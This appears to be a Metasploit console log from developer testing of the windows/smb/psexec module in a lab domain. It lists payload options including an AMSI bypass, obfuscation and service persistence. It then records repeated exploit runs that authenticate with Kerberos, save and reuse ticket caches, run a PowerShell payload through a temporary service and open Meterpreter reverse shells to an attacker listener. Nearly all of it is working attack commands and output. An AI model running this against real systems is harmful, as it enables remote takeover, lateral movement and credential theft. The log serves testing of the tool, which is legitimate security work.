   PSH_PATH                                Windows\System32\WindowsPowerShell\v1.0\powershell.exe  no        Path to powershell.exe
   Powershell::encode_final_payload        false                                                   yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false                                                   yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false                                                   yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false                                                   yes       Encrypt PSH with RC4
   Powershell::method                      reflection                                              yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false                                                   yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true                                                    yes       Execute powershell without interaction
   Powershell::persist                     false                                                   yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  auto                                                    yes       Prepend AMSI/SBL bypass (Accepted: auto, true, false)
   Powershell::prepend_sleep                                                                       no        Prepend seconds of sleep
   Powershell::remove_comspec              false                                                   yes       Produce script calling powershell directly
   Powershell::strip_comments              true                                                    yes       Strip comments
   Powershell::strip_whitespace            false                                                   yes       Strip whitespace
   Powershell::sub_funcs                   false                                                   yes       Substitute function names
   Powershell::sub_vars                    true                                                    yes       Substitute variable names
   Powershell::wrap_double_quotes          true                                                    yes       Wraps the -Command argument in single quotes
   Proxies                                                                                         no        A proxy chain of format type:host:port[,type:host:port][...]
   SERVICE_FILENAME                                                                                no        Filename to to be used on target for the service binary
   SERVICE_PERSIST                         false                                                   yes       Create an Auto run service and do not remove it.
   SERVICE_STUB_ENCODER                                                                            no        Encoder to use around the service registering stub
   SMB::AlwaysEncrypt                      true                                                    yes       Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client wil
                                                                                                             l still encrypt the communication if the server requires it
   SMB::ChunkSize                          500                                                     yes       The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
   SMB::Native_LM                          Windows 2000 5.0                                        yes       The Native LM to send during authentication
   SMB::Native_OS                          Windows 2000 2195                                       yes       The Native OS to send during authentication
   SMB::ProtocolVersion                    1,2,3                                                   yes       One or a list of coma-separated SMB protocol versions to negotiate (e.g. "1" or "1,2" or "2,3,1")
   SMB::VerifySignature                    false                                                   yes       Enforces client-side verification of server response signatures
   SMBAuth                                 kerberos                                                yes       The Authentication mechanism to use (Accepted: auto, ntlm, kerberos)
   SMBDirect                               true                                                    no        The target port is a raw SMB service (not NetBIOS)
   SMBName                                 *SMBSERVER                                              yes       The NetBIOS hostname (required for port 139 connections)
   SSL                                     false                                                   no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                                                                       no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLServerNameIndication                                                                         no        SSL/TLS Server Name Indication (SNI)
   SSLVerifyMode                           PEER                                                    no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion                              Auto                                                    yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS
                                                                                                             1.1, TLS1.2)
   SmbKrb5Ccname                                                                                   no        The ccache file to use for kerberos authentication
   SmbRhostname                            WIN-3MSP8K2LCGC.msflab.local                            no        The rhostname which is required for kerberos
   VERBOSE                                 True                                                    no        Enable detailed status messages
   WORKSPACE                                                                                       no        Specify the workspace for this module
   WfsDelay                                10                                                      no        Additional delay in seconds to wait for a session


Payload advanced options (windows/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugBuild        false            no        Use a debug version of Meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      True             no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

msf6 exploit(windows/smb/psexec) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf6 exploit(windows/smb/psexec) > exploit -z

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGT-Response
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:445 - 192.168.159.10:88 - TGS MIT Credential Cache saved to /home/smcintyre/.msf4/loot/20220718173211_default_192.168.159.10_mit.kerberos.cca_525155.bin
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 4508
[*] 192.168.159.10:445 - Executing the payload...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Sending stage (200774 bytes) to 192.168.159.10
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:59448) at 2022-07-18 17:32:14 -0400
[*] Session 1 created in the background.
msf6 exploit(windows/smb/psexec) > exploit -z

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 4516
[*] 192.168.159.10:445 - Executing the payload...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Sending stage (200774 bytes) to 192.168.159.10
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.10:59449) at 2022-07-18 17:32:20 -0400
[*] Session 2 created in the background.
msf6 exploit(windows/smb/psexec) > cp /home/smcintyre/.msf4/loot/20220718173211_default_192.168.159.10_mit.kerberos.cca_525155.bin /tmp/ccache
[*] exec: cp /home/smcintyre/.msf4/loot/20220718173211_default_192.168.159.10_mit.kerberos.cca_525155.bin /tmp/ccache

msf6 exploit(windows/smb/psexec) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf6 exploit(windows/smb/psexec) > exploit -z

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGT-Response
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:445 - 192.168.159.10:88 - TGS MIT Credential Cache saved to /home/smcintyre/.msf4/loot/20220718173232_default_192.168.159.10_mit.kerberos.cca_500263.bin
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 4475
[*] 192.168.159.10:445 - Executing the payload...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[*] Sending stage (200774 bytes) to 192.168.159.10
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.10:59450) at 2022-07-18 17:32:34 -0400
[*] Session 3 created in the background.
msf6 exploit(windows/smb/psexec) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf6 exploit(windows/smb/psexec) > set SmbKrb5Ccname /tmp/ccache
SmbKrb5Ccname => /tmp/ccache
msf6 exploit(windows/smb/psexec) > exploit -z

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 4494
[*] 192.168.159.10:445 - Executing the payload...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[*] Sending stage (200774 bytes) to 192.168.159.10
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.10:59452) at 2022-07-18 17:32:52 -0400
[*] Session 4 created in the background.
msf6 exploit(windows/smb/psexec) > loot 

Loot
====

host  service  type  name  content  info  path
----  -------  ----  ----  -------  ----  ----

msf6 exploit(windows/smb/psexec) > exploit -z SmbKrb5Ccname=

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGT-Response
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:445 - 192.168.159.10:88 - TGS MIT Credential Cache saved to /home/smcintyre/.msf4/loot/20220718173305_default_192.168.159.10_mit.kerberos.cca_425795.bin
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 4498
[*] 192.168.159.10:445 - Executing the payload...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Sending stage (200774 bytes) to 192.168.159.10
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.10:59453) at 2022-07-18 17:33:07 -0400
[*] Session 5 created in the background.
msf6 exploit(windows/smb/psexec) > loot

Loot
====

host            service  type                 name  content                   info                                                                                      path
----            -------  ----                 ----  -------                   ----                                                                                      ----
192.168.159.10           mit.kerberos.ccache        application/octet-stream  realm: MSFLAB.LOCAL, serviceName: cifs/win-3msp8k2lcgc.msflab.local, username: smcintyre  /home/smcintyre/.msf4/loot/20220718173305_default_192.168.159.10_mit.kerberos.cca_425795.bin

msf6 exploit(windows/smb/psexec) >
```
</details>